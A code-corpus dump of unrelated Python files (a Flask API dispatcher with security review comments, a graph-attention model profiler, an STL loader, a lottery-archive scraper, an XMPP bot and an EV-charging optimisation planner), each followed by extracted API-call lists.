    real_ip = request.headers.get('X-Real-Ip')
    if real_ip is not None:
        app.config['client_ip'] = real_ip
    return render_template('index.html', config=app.config)
@webapp.route('/api/')
@webapp.route('/api/<path:api_method>', methods=['POST', 'GET'])
def respond(api_method=None):
    """Dispatch an API request to the matching function in core.ctrl.api.

    The request payload is taken from JSON, form data, or query args
    depending on method/content type; authorization runs first and the
    target function is only invoked on success. Always returns a JSON
    envelope describing the outcome.
    """
    # Record caller IP; proxy headers win over the raw socket address.
    forwarded_for = request.headers.get('X-Forwarded-For')
    if forwarded_for is not None:
        app.config['client_ip'] = forwarded_for
    else:
        app.config['client_ip'] = request.remote_addr
    real_ip = request.headers.get('X-Real-Ip')
    if real_ip is not None:
        app.config['client_ip'] = real_ip

    api_method = str(api_method).replace('/', '')
    reason = f"API route {api_method} is not supported"
    module_status = False
    result = None
    request_method = "Unknown"

    # SECURITY NOTE(review): `api_method in dir(api)` exposes *every*
    # attribute of the api module (including its imports) as a route --
    # consider an explicit whitelist of endpoint names.
    if api_method is not None and api_method in dir(api):
        reason = f"API route: {api_method}"
        data_pass = {}
        if request.method == 'POST':
            request_method = 'POST'
            content_type = request.headers.get('Content-type')
            if content_type is not None and content_type.startswith('application/json'):
                request_method = 'POST-JSON'
                data_pass = request.get_json()
            else:
                data_pass = request.form
        else:
            request_method = 'GET'
            data_pass = request.args
        data_pass = dict(data_pass)

        logged = auth.authorization_process(api_method)
        result = logged
        app.config['user'] = result
        if logged['status'] == True:
            # Start api request passing
            module_status = True
            if api_method != 'login':
                result = getattr(api, api_method)(data_pass)

    res = json.dumps({
        'api': f"{app.config['full_name']} REST api 1.0",
        'module_status': module_status,
        'request_method': request_method,
        'reason': reason,
        'result': result
    })
    return Response(res, mimetype='application/json')
@webapp.route('/resource/')
@webapp.route('/resource/<path:resource_name>')
def get_resource(resource_name=None):
    """Serve a static resource file from the configured resources directory.

    Returns a plain-text error when no resource name was supplied or the
    file cannot be served.
    """
    resource_dir = app.config['filesystem']['resources'].replace('/', os.path.sep)
    # BUGFIX: check for None *before* str()-conversion -- the original turned
    # None into the literal "None", making this branch unreachable.
    if resource_name is None:
        return Response("Resource not defined.", mimetype='text/plain')
    resource_name = str(resource_name).replace('/', '')
    try:
        return send_from_directory(directory=resource_dir, path=resource_name)
    except Exception:
        return Response(f"Resource {resource_name} not found.", mimetype='text/plain')
if __name__ == '__main__':
    # Log to a file named per month, e.g. storage/logs/ctrl-server-2024-01.log.
    today = datetime.date.today()
    logging.basicConfig(
        filename=f"storage/logs/ctrl-server-{today.strftime('%Y-%m')}.log", level=logging.INFO, format='%(asctime)s %(message)s')

    # Open, any host allowed
    # SECURITY NOTE(review): debug=True together with host='0.0.0.0' exposes
    # the Werkzeug debugger to the network -- confirm this is dev-only.
    webapp.run(debug=True, host='0.0.0.0', port='5007')
    # Secure, only localhost allowed
    # webapp.run(debug=True, host='127.0.0.1', port='5007')
| [
"flask.render_template",
"core.compat.check_version",
"flask.send_from_directory",
"flask.Flask",
"core.ctrl.auth.authorization_process",
"json.dumps",
"flask.request.get_json",
"flask.Response",
"datetime.date.today",
"flask.request.headers.get"
] | [((238, 260), 'core.compat.check_version', 'compat.check_version', ([], {}), '()\n', (258, 260), False, 'from core import compat, app, utils\n'), ((270, 285), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (275, 285), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((659, 707), 'flask.render_template', 'render_template', (['"""index.html"""'], {'config': 'app.config'}), "('index.html', config=app.config)\n", (674, 707), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((2261, 2433), 'json.dumps', 'json.dumps', (['{\'api\': f"{app.config[\'full_name\']} REST api 1.0", \'module_status\':\n module_status, \'request_method\': request_method, \'reason\': reason,\n \'result\': result}'], {}), '({\'api\': f"{app.config[\'full_name\']} REST api 1.0",\n \'module_status\': module_status, \'request_method\': request_method,\n \'reason\': reason, \'result\': result})\n', (2271, 2433), False, 'import json\n'), ((2484, 2526), 'flask.Response', 'Response', (['res'], {'mimetype': '"""application/json"""'}), "(res, mimetype='application/json')\n", (2492, 2526), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((3049, 3106), 'flask.Response', 'Response', (['f"""Resource not defined."""'], {'mimetype': '"""text/plain"""'}), "(f'Resource not defined.', mimetype='text/plain')\n", (3057, 3106), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((3148, 3169), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3167, 3169), False, 'import datetime\n'), ((345, 383), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (364, 383), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((427, 465), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), 
"('X-Forwarded-For')\n", (446, 465), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((538, 570), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (557, 570), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((614, 646), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (633, 646), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((835, 873), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (854, 873), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((917, 955), 'flask.request.headers.get', 'request.headers.get', (['"""X-Forwarded-For"""'], {}), "('X-Forwarded-For')\n", (936, 955), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1028, 1060), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (1047, 1060), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1104, 1136), 'flask.request.headers.get', 'request.headers.get', (['"""X-Real-Ip"""'], {}), "('X-Real-Ip')\n", (1123, 1136), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1940, 1978), 'core.ctrl.auth.authorization_process', 'auth.authorization_process', (['api_method'], {}), '(api_method)\n', (1966, 1978), False, 'from core.ctrl import api, auth\n'), ((2846, 2909), 'flask.send_from_directory', 'send_from_directory', ([], {'directory': 'resource_dir', 'path': 'resource_name'}), '(directory=resource_dir, path=resource_name)\n', (2865, 2909), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1721, 1739), 'flask.request.get_json', 'request.get_json', 
([], {}), '()\n', (1737, 1739), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((2965, 3036), 'flask.Response', 'Response', (['f"""Resource {resource_name} not found."""'], {'mimetype': '"""text/plain"""'}), "(f'Resource {resource_name} not found.', mimetype='text/plain')\n", (2973, 3036), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1532, 1567), 'flask.request.headers.get', 'request.headers.get', (['"""Content-type"""'], {}), "('Content-type')\n", (1551, 1567), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n'), ((1580, 1615), 'flask.request.headers.get', 'request.headers.get', (['"""Content-type"""'], {}), "('Content-type')\n", (1599, 1615), False, 'from flask import Flask, render_template, Response, request, send_from_directory\n')] |
from __future__ import division
from __future__ import print_function
import os
import glob
import time
import random
import argparse
import numpy as np
import torch
import torchvision.models as models
import torch.autograd.profiler as profiler
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from utils import load_data, accuracy
from models import GAT, SpGAT
# Training settings
# Command-line options: training schedule, model size, regularisation,
# and optional timing/checkpoint file paths.
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=False, help='Disables CUDA training.')
parser.add_argument('--fastmode', action='store_true', default=False, help='Validate during training pass.')
parser.add_argument('--sparse', action='store_true', default=False, help='GAT with sparse version or not.')
parser.add_argument('--epochs', type=int, default=10000, help='Number of epochs to train.')
parser.add_argument('--lr', type=float, default=0.005, help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4, help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=8, help='Number of hidden units.')
parser.add_argument('--nb_heads', type=int, default=8, help='Number of head attentions.')
parser.add_argument('--dropout', type=float, default=0.6, help='Dropout rate (1 - keep probability).')
parser.add_argument('--alpha', type=float, default=0.2, help='Alpha for the leaky_relu.')
parser.add_argument('--patience', type=int, default=100, help='Patience')
parser.add_argument('--seed', type=int, default=72, help='Random seed.')
parser.add_argument('--time_file', type=str, default='', help='timing output file')
parser.add_argument('--pkl_file', type=str, default='trained-model.pkl', help='trained model input file (pkl)')

args = parser.parse_args()
# Use CUDA only when available *and* not explicitly disabled.
args.cuda = not args.no_cuda and torch.cuda.is_available()

# Seed every RNG source for reproducibility.
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
    torch.cuda.manual_seed(args.seed)

# Load data
adj, features, labels, idx_train, idx_val, idx_test = load_data()

# Model and optimizer (sparse-attention variant when --sparse is given)
if args.sparse:
    model = SpGAT(nfeat=features.shape[1],
                nhid=args.hidden,
                nclass=int(labels.max()) + 1,
                dropout=args.dropout,
                nheads=args.nb_heads,
                alpha=args.alpha)
else:
    model = GAT(nfeat=features.shape[1],
                nhid=args.hidden,
                nclass=int(labels.max()) + 1,
                dropout=args.dropout,
                nheads=args.nb_heads,
                alpha=args.alpha)
optimizer = optim.Adam(model.parameters(),
                       lr=args.lr,
                       weight_decay=args.weight_decay)

# Move everything to the GPU when CUDA is enabled.
if args.cuda:
    model.cuda()
    features = features.cuda()
    adj = adj.cuda()
    labels = labels.cuda()
    idx_train = idx_train.cuda()
    idx_val = idx_val.cuda()
    idx_test = idx_test.cuda()

# NOTE: torch.autograd.Variable is a deprecated no-op wrapper in modern
# PyTorch (>= 0.4); kept for compatibility with the original code.
features, adj, labels = Variable(features), Variable(adj), Variable(labels)
def compute_test():
    """Evaluate the model on the test split under the autograd profiler and
    print loss, accuracy, and a memory-usage profile table."""
    with profiler.profile(profile_memory=True, record_shapes=True, use_cuda=True) as prof, \
            profiler.record_function("model_inference"):
        model.eval()
        output = model(features, adj)
        test_loss = F.nll_loss(output[idx_test], labels[idx_test])
        test_acc = accuracy(output[idx_test], labels[idx_test])
    print("Test set results:",
          "loss= {:.4f}".format(test_loss.data.item()),
          "accuracy= {:.4f}".format(test_acc.data.item()))
    print(prof.key_averages().table(sort_by="cpu_memory_usage", row_limit=10))
def time_model(file):
    """Measure the average forward-pass runtime and write it to a file.

    Runs 50 warm-up passes, then times 50 measured passes of
    model(features, adj) and writes the per-pass average (seconds) to *file*.

    :param file: path of the output file receiving the average runtime
    """
    model.eval()
    n_warmup = 50
    n_sample = 50
    print("=== Running Warmup Passes")
    for i in range(0, n_warmup):
        output = model(features, adj)

    print("=== Collecting Runtime over ", str(n_sample), " Passes")
    tic = time.perf_counter()
    for i in range(0, n_sample):
        output = model(features, adj)
    toc = time.perf_counter()
    avg_runtime = float(toc - tic) / n_sample
    print("average runtime = ", avg_runtime)

    # FIX: use a context manager so the file handle is closed even if the
    # write raises (original used bare open()/close()).
    with open(file, "w") as f:
        f.write(str(avg_runtime) + "\n")
if __name__ == "__main__":
map_location=torch.device('cpu')
model.load_state_dict(torch.load(args.pkl_file))
if len(args.time_file) != 0: # time and send time to file
time_model(args.time_file)
compute_test() | [
"torch.manual_seed",
"utils.load_data",
"argparse.ArgumentParser",
"torch.nn.functional.nll_loss",
"utils.accuracy",
"torch.load",
"time.perf_counter",
"random.seed",
"torch.autograd.profiler.profile",
"torch.cuda.is_available",
"torch.autograd.profiler.record_function",
"numpy.random.seed",
... | [((464, 489), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (487, 489), False, 'import argparse\n'), ((1894, 1916), 'random.seed', 'random.seed', (['args.seed'], {}), '(args.seed)\n', (1905, 1916), False, 'import random\n'), ((1917, 1942), 'numpy.random.seed', 'np.random.seed', (['args.seed'], {}), '(args.seed)\n', (1931, 1942), True, 'import numpy as np\n'), ((1943, 1971), 'torch.manual_seed', 'torch.manual_seed', (['args.seed'], {}), '(args.seed)\n', (1960, 1971), False, 'import torch\n'), ((2091, 2102), 'utils.load_data', 'load_data', ([], {}), '()\n', (2100, 2102), False, 'from utils import load_data, accuracy\n'), ((1868, 1893), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1891, 1893), False, 'import torch\n'), ((1990, 2023), 'torch.cuda.manual_seed', 'torch.cuda.manual_seed', (['args.seed'], {}), '(args.seed)\n', (2012, 2023), False, 'import torch\n'), ((2986, 3004), 'torch.autograd.Variable', 'Variable', (['features'], {}), '(features)\n', (2994, 3004), False, 'from torch.autograd import Variable\n'), ((3006, 3019), 'torch.autograd.Variable', 'Variable', (['adj'], {}), '(adj)\n', (3014, 3019), False, 'from torch.autograd import Variable\n'), ((3021, 3037), 'torch.autograd.Variable', 'Variable', (['labels'], {}), '(labels)\n', (3029, 3037), False, 'from torch.autograd import Variable\n'), ((4005, 4024), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4022, 4024), False, 'import time\n'), ((4105, 4124), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (4122, 4124), False, 'import time\n'), ((4361, 4380), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (4373, 4380), False, 'import torch\n'), ((3068, 3140), 'torch.autograd.profiler.profile', 'profiler.profile', ([], {'profile_memory': '(True)', 'record_shapes': '(True)', 'use_cuda': '(True)'}), '(profile_memory=True, record_shapes=True, use_cuda=True)\n', (3084, 3140), True, 'import torch.autograd.profiler as 
profiler\n'), ((4407, 4432), 'torch.load', 'torch.load', (['args.pkl_file'], {}), '(args.pkl_file)\n', (4417, 4432), False, 'import torch\n'), ((3163, 3206), 'torch.autograd.profiler.record_function', 'profiler.record_function', (['"""model_inference"""'], {}), "('model_inference')\n", (3187, 3206), True, 'import torch.autograd.profiler as profiler\n'), ((3299, 3345), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['output[idx_test]', 'labels[idx_test]'], {}), '(output[idx_test], labels[idx_test])\n', (3309, 3345), True, 'import torch.nn.functional as F\n'), ((3369, 3413), 'utils.accuracy', 'accuracy', (['output[idx_test]', 'labels[idx_test]'], {}), '(output[idx_test], labels[idx_test])\n', (3377, 3413), False, 'from utils import load_data, accuracy\n')] |
import numpy as np
import logging
import random
def open_stl(filename):
    """Parse an ASCII STL file and return a (possibly decimated) triangle mesh.

    The file is read twice: once to count lines (an ASCII STL has 2
    header/footer lines plus 7 lines per facet), once to collect vertex
    coordinates. Meshes much larger than 100k triangles are decimated by
    keeping every ratio-th facet.

    :param filename: path to an ASCII STL file
    :return: tuple (x, y, z, triangles) -- flat numpy coordinate arrays and
             a list of (i, j, k) vertex-index triples
    """
    with open(filename) as f:
        count = sum(1 for _ in f)
    logging.info("number of lines {}".format(count))

    # BUGFIX: use integer division -- under Python 3 `/` yields a float,
    # which breaks np.zeros(...), slicing, and list repetition below.
    tri_count = (count - 2) // 7
    logging.info("number of triangles {}".format(tri_count))
    vert_count = tri_count * 3
    logging.info("number of vertices {}".format(vert_count))

    x = np.zeros((tri_count, 3))
    y = np.zeros((tri_count, 3))
    z = np.zeros((tri_count, 3))
    i = 0
    j = 0
    with open(filename) as f:
        for line in f:
            if "vertex" in line:
                tokens = line.split()
                x[i][j] = float(tokens[1])
                y[i][j] = float(tokens[2])
                z[i][j] = float(tokens[3])
                j += 1
                if j == 3:
                    j = 0
                    i += 1

    # Decimate very large meshes down to roughly 100k triangles.
    ratio = tri_count // 100000
    if ratio >= 2:
        x = x[::ratio, :]
        y = y[::ratio, :]
        z = z[::ratio, :]
        tri_count = tri_count // ratio

    # BUGFIX: xrange is Python 2 only; use range.
    triangles = [None] * tri_count
    for i in range(tri_count):
        v = i * 3
        triangles[i] = (v, v + 1, v + 2)
    return x.flatten(), y.flatten(), z.flatten(), triangles
if __name__ == "__main__":
# x, y, z, triangles = open_stl("STL_INSTANCES\\50_cat_3446170_3_d.stl")
x, y, z, triangles = open_stl("20_allison_x4560_1_e.stl")
from mayavi import mlab
s = mlab.triangular_mesh(x, y, z, triangles, color=(random.random() / 2 + 0.5,
random.random() / 2 + 0.5,
random.random() / 2 + 0.5
))
mlab.show()
| [
"random.random",
"numpy.zeros",
"mayavi.mlab.show"
] | [((431, 455), 'numpy.zeros', 'np.zeros', (['(tri_count, 3)'], {}), '((tri_count, 3))\n', (439, 455), True, 'import numpy as np\n'), ((465, 489), 'numpy.zeros', 'np.zeros', (['(tri_count, 3)'], {}), '((tri_count, 3))\n', (473, 489), True, 'import numpy as np\n'), ((499, 523), 'numpy.zeros', 'np.zeros', (['(tri_count, 3)'], {}), '((tri_count, 3))\n', (507, 523), True, 'import numpy as np\n'), ((1848, 1859), 'mayavi.mlab.show', 'mlab.show', ([], {}), '()\n', (1857, 1859), False, 'from mayavi import mlab\n'), ((1589, 1604), 'random.random', 'random.random', ([], {}), '()\n', (1602, 1604), False, 'import random\n'), ((1673, 1688), 'random.random', 'random.random', ([], {}), '()\n', (1686, 1688), False, 'import random\n'), ((1757, 1772), 'random.random', 'random.random', ([], {}), '()\n', (1770, 1772), False, 'import random\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from urllib.parse import urljoin
import requests
from bs4 import BeautifulSoup
import csv
def get_number(text: str) -> int:
return int(''.join(c for c in text.strip() if c.isdigit()))
first = 1
last = 50
step = 50
result = []
while True:
url = f'https://www.stoloto.ru/4x20/archive?firstDraw={first}&lastDraw={last}&mode=draw'
print(f'first={first}, last={last}: {url}')
rs = requests.get(url)
root = BeautifulSoup(rs.content, 'html.parser')
rows = root.select('.drawings_data .elem > .main')
# Если пустое, значит достигли конца
if not rows:
break
# Чтобы был порядок от меньшего к большему
rows.reverse()
for row in rows:
date_time_str = row.select_one('.draw_date').text.strip()
a = row.select_one('.draw > a')
abs_url = urljoin(url, a['href'])
number = get_number(a.text)
numbers = ' '.join(x.text.strip() for x in row.select('.numbers .numbers_wrapper b'))
prize = get_number(row.select_one('.prize').text)
item = [number, date_time_str, numbers, prize, abs_url]
result.append(item)
print(item)
first += step
last += step
print()
print(len(result), result)
# Наибольшая сумма приза
print(max(result, key=lambda x: x[3]))
# Наименьшая сумма приза
print(min(result, key=lambda x: x[3]))
print()
with open('all_lotto.csv', 'w', encoding='utf-8', newline='') as f:
file = csv.writer(f)
file.writerows(result)
| [
"bs4.BeautifulSoup",
"urllib.parse.urljoin",
"csv.writer",
"requests.get"
] | [((473, 490), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (485, 490), False, 'import requests\n'), ((502, 542), 'bs4.BeautifulSoup', 'BeautifulSoup', (['rs.content', '"""html.parser"""'], {}), "(rs.content, 'html.parser')\n", (515, 542), False, 'from bs4 import BeautifulSoup\n'), ((1501, 1514), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (1511, 1514), False, 'import csv\n'), ((885, 908), 'urllib.parse.urljoin', 'urljoin', (['url', "a['href']"], {}), "(url, a['href'])\n", (892, 908), False, 'from urllib.parse import urljoin\n')] |
# -*- coding: utf-8 -*-
from common.models.notice.UserNews import UserNews
from common.services.BaseService import BaseService
from application import db
class NewsService(BaseService):
@staticmethod
def addNews(params):
model_user_news = UserNews(**params)
db.session.add(model_user_news)
db.session.commit()
| [
"common.models.notice.UserNews.UserNews",
"application.db.session.add",
"application.db.session.commit"
] | [((257, 275), 'common.models.notice.UserNews.UserNews', 'UserNews', ([], {}), '(**params)\n', (265, 275), False, 'from common.models.notice.UserNews import UserNews\n'), ((284, 315), 'application.db.session.add', 'db.session.add', (['model_user_news'], {}), '(model_user_news)\n', (298, 315), False, 'from application import db\n'), ((324, 343), 'application.db.session.commit', 'db.session.commit', ([], {}), '()\n', (341, 343), False, 'from application import db\n')] |
#!/usr/bin/env python
# vim:ts=4:sw=4:expandtab:ft=python:fileencoding=utf-8
"""Marvin jabber bot.
A jabber bot made to play with jabber, python, etc and hopefully still be
useful.
@todo: use a decorator for admin commands
"""
#__version__ = "$Rev$"
import sys
sys.path.append('lib')
import datetime
import hashlib
import os
import string
from random import choice
from ConfigParser import ConfigParser
from jabberbot import JabberBot
import botcommands
class MarvinJabberBot(JabberBot):
"""Incredible... It's even worse than I thought it would be.
Source code: http://github.com/vrillusions/marvin-jabberbot"""
def __init__(self, jid, password, res=None, adminjid=None):
"""The init function."""
if hasattr(JabberBot, '__init__'):
JabberBot.__init__(self, jid, password, res)
self.adminjid = adminjid
def _if_admin(self, jid, command):
if jid == self.adminjid:
result = eval(command)
return result
else:
return 'Not authorized'
def connectCallback(self):
"""Called after successful connection but before processing"""
# would have like to add the RegisterHandlers here but it doesn't appear to work
pass
def subscribe_handler(self, conn, pres):
"""Handles requests from users to subscribe to bot"""
# for some reason this HAS to be set before the initial connection. Place the
# following in the connect() function of main file
# conn.RegisterHandler('presence', self.subscribe_handler, 'subscribe')
jid = pres.getFrom().getStripped()
self.conn.Roster.Authorize(jid)
self.conn.Roster.Subscribe(jid)
def unsubscribed_handler(self, conn, pres):
"""Handles notifications that the user has unsubscribed (removed) the bot"""
# place follwoing in connect() function of main file
# conn.RegisterHandler('presence', self.unsubscribed_handler, 'unsubscribed')
jid = pres.getFrom().getStripped()
self.conn.Roster.delItem(jid)
def bot_privacy(self, mess, args):
"""A simplistic privacy polic (summary: nothing is logged)"""
privacytext = open('etc/privacy.txt', 'r').read()
return privacytext
def bot_serverinfo(self, mess, args):
"""HIDDEN Displays information about the server."""
#version = open('/proc/version').read().strip()
#loadavg = open('/proc/loadavg').read().strip()
#return '%s\n\n%s' % ( version, loadavg, )
jid = mess.getFrom().getStripped()
return self._if_admin(jid, 'botcommands.getServerInfo()')
def bot_url(self, mess, args):
"""Returns a shorten form of url."""
# only process the first "word"
if args == '':
return "Syntax: url http://google.com"
argList = []
argList = args.split()
return botcommands.getShortUrl(argList[0])
def bot_length(self, mess, args):
"""Returns how long the specified message is."""
return len(args)
def bot_md5(self, mess, args):
"""Returns MD5 hash in hexadecimal format."""
return hashlib.md5(args).hexdigest()
def bot_lookupmd5(self, mess, args):
"""Attempts to lookup the value of an MD5 hash."""
return botcommands.lookupMd5(args)
def bot_sha1(self, mess, args):
"""Returns SHA1 hash in hexadecimal format."""
return hashlib.sha1(args).hexdigest()
def bot_reload(self, mess, args):
"""HIDDEN Reloads the bot."""
jid = mess.getFrom().getStripped()
result = self._if_admin(jid, 'self.quit()')
return result
def bot_time(self, mess, args):
"""Displays current server time."""
return str(datetime.datetime.now()) + " EST/EDT"
def bot_rot13(self, mess, args):
"""Returns passed arguments rot13'ed."""
return args.encode('rot13')
def bot_whoami(self, mess, args):
"""Tells you your username."""
return mess.getFrom()
def bot_fortune(self, mess, args):
"""Get a random quote."""
# taken from snakebot jabber bot
fortune = os.popen('/usr/games/fortune').read()
return fortune
def bot_spell(self, mess, args):
"""Checks the spelling of a word"""
return botcommands.spellCheck(args)
def bot_random(self, mess, args):
"""Returns a random 32 character string useful for passwords"""
chars = string.letters + string.digits
randomOutput = ''
for i in range(32):
randomOutput = randomOutput + choice(chars)
return randomOutput
def bot_password(self, mess, args):
"""Similar to random command but tries to produce a pronounceable password"""
vowels = 'aeiou'
consonants = 'bcdfghjklmnpqrstvwxyz'
numbers = string.digits
randomPassword = ( choice(consonants) + choice(vowels) + choice(consonants) +
choice(vowels) + choice(consonants) + choice(vowels) + choice(consonants) +
choice(numbers) )
return randomPassword
def bot_ascii2hex(self, mess, args):
"""Takes an ascii string and converts it to hexadecimal."""
return args.encode('hex')
def bot_hex2ascii(self, mess, args):
"""Takes a hex string and converts it to ascii."""
return args.decode('hex')
def bot_dbg(self, mess, args):
"""HIDDEN used for debugging"""
jid = mess.getFrom().getStripped()
self._if_admin(jid, '"True"')
jid = mess.getFrom().getStripped()
jidobj = mess.getFrom()
#jid = '<EMAIL>'
subscribe = self.conn.Roster.getSubscription( jid)
ask = self.conn.Roster.getAsk(jid)
# show = self.conn.Roster.getShow(jidobj)
group = self.conn.Roster.getGroups(jid)
result = 'sub:%s ask:%s group:%s' % (subscribe, ask, group)
#result = self.conn.Roster.getRawItem(jid)
#result = self.conn.Roster.getItems()
return result
if __name__ == '__main__':
config = ConfigParser()
config.read('etc/config.ini')
username = config.get('jabberbot', 'username')
password = config.get('<PASSWORD>', 'password')
adminjid = config.get('jabberbot', 'adminjid')
bot = MarvinJabberBot(jid=username,password=password,adminjid=adminjid)
bot.serve_forever(bot.connectCallback())
# error handling is handled in serve_forever, don't think it is needed
# here. At least it's not as important
| [
"random.choice",
"hashlib.md5",
"botcommands.getShortUrl",
"jabberbot.JabberBot.__init__",
"ConfigParser.ConfigParser",
"datetime.datetime.now",
"os.popen",
"botcommands.spellCheck",
"hashlib.sha1",
"sys.path.append",
"botcommands.lookupMd5"
] | [((266, 288), 'sys.path.append', 'sys.path.append', (['"""lib"""'], {}), "('lib')\n", (281, 288), False, 'import sys\n'), ((6151, 6165), 'ConfigParser.ConfigParser', 'ConfigParser', ([], {}), '()\n', (6163, 6165), False, 'from ConfigParser import ConfigParser\n'), ((2928, 2963), 'botcommands.getShortUrl', 'botcommands.getShortUrl', (['argList[0]'], {}), '(argList[0])\n', (2951, 2963), False, 'import botcommands\n'), ((3344, 3371), 'botcommands.lookupMd5', 'botcommands.lookupMd5', (['args'], {}), '(args)\n', (3365, 3371), False, 'import botcommands\n'), ((4372, 4400), 'botcommands.spellCheck', 'botcommands.spellCheck', (['args'], {}), '(args)\n', (4394, 4400), False, 'import botcommands\n'), ((787, 831), 'jabberbot.JabberBot.__init__', 'JabberBot.__init__', (['self', 'jid', 'password', 'res'], {}), '(self, jid, password, res)\n', (805, 831), False, 'from jabberbot import JabberBot\n'), ((5118, 5133), 'random.choice', 'choice', (['numbers'], {}), '(numbers)\n', (5124, 5133), False, 'from random import choice\n'), ((3194, 3211), 'hashlib.md5', 'hashlib.md5', (['args'], {}), '(args)\n', (3205, 3211), False, 'import hashlib\n'), ((3479, 3497), 'hashlib.sha1', 'hashlib.sha1', (['args'], {}), '(args)\n', (3491, 3497), False, 'import hashlib\n'), ((3812, 3835), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3833, 3835), False, 'import datetime\n'), ((4214, 4244), 'os.popen', 'os.popen', (['"""/usr/games/fortune"""'], {}), "('/usr/games/fortune')\n", (4222, 4244), False, 'import os\n'), ((4659, 4672), 'random.choice', 'choice', (['chars'], {}), '(chars)\n', (4665, 4672), False, 'from random import choice\n'), ((5084, 5102), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (5090, 5102), False, 'from random import choice\n'), ((5067, 5081), 'random.choice', 'choice', (['vowels'], {}), '(vowels)\n', (5073, 5081), False, 'from random import choice\n'), ((5046, 5064), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', 
(5052, 5064), False, 'from random import choice\n'), ((5029, 5043), 'random.choice', 'choice', (['vowels'], {}), '(vowels)\n', (5035, 5043), False, 'from random import choice\n'), ((4995, 5013), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (5001, 5013), False, 'from random import choice\n'), ((4957, 4975), 'random.choice', 'choice', (['consonants'], {}), '(consonants)\n', (4963, 4975), False, 'from random import choice\n'), ((4978, 4992), 'random.choice', 'choice', (['vowels'], {}), '(vowels)\n', (4984, 4992), False, 'from random import choice\n')] |
from src.planners.exact._create_model import create_model
from src.planners.exact._read_model import read_model
from src.planners.planner import Planner
from pyomo.environ import *
class ExactPlanner(Planner):
def __init__(self,
opf_method='lossless',
observe_ev_locations='full',
future_model='known-future',
n_future_samples=5,
grid_transformation=None,
normalize=True,
obj_factors=(1, ),
tee=False,
accept_unknown_solution=False,
debugging=False,
**solver_options):
assert opf_method in ['exact', 'lossless'], ('Unknown opf method %s' % opf_method)
self.opf_method = opf_method
name_base = 'ExactPlanner' if opf_method == 'exact' else 'LosslessPlanner'
super().__init__(name_base, observe_ev_locations, future_model, n_future_samples,
grid_transformation, normalize, obj_factors, tee, accept_unknown_solution,
debugging, **solver_options)
def create_solver(self, ):
solver = SolverFactory('ipopt') if self.opf_method == 'exact' else SolverFactory('glpk')
#solver = SolverFactory('ipopt')
for key, val in self.solver_options.items():
solver.options[key] = val
return solver
def solve(self, true_grid, surrogate_grid, sampled_scenarios,
t_current_ind, SOC_evs_current, obj_factor, norm_factor):
model = create_model(self.opf_method, true_grid, surrogate_grid, sampled_scenarios, t_current_ind,
SOC_evs_current, obj_factor=obj_factor, norm_factor=norm_factor)
solver = self.create_solver()
solver.solve(model, tee=self.tee)
P_evs_now, P_nodes_now = read_model(model, surrogate_grid)
#print('P_evs_now:', P_evs_now.round())
#print('P_nodes_now', P_nodes_now.round())
#print()
#print('Solution:', P_evs_now)
#print('P_nodes_now', P_nodes_now)
return P_evs_now, [[]], [[]], [[]]
| [
"src.planners.exact._create_model.create_model",
"src.planners.exact._read_model.read_model"
